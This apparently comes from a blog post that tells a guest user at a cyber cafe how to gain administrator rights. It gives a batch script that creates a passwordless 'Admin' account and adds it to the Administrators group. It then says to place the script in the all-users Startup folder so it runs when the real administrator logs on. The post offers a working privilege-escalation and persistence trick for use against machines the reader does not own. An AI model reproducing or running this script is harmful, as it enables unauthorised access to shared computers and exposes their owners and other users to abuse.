Create A Administrator Account As A Guest User In Any Cyber Cafe:

Code:
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin


Now copy this to notepad and save as admin.bat

Copy the file to the statup folder.
Here is the path of startup folder.


C:\Documents and Settings\All Users\Start Menu\Programs\Startup


When the admin logs on the batch file runs and the admin acc is created...

so next time u log on u can use the username:admin
password:no

ليست هناك تعليقات:

إرسال تعليق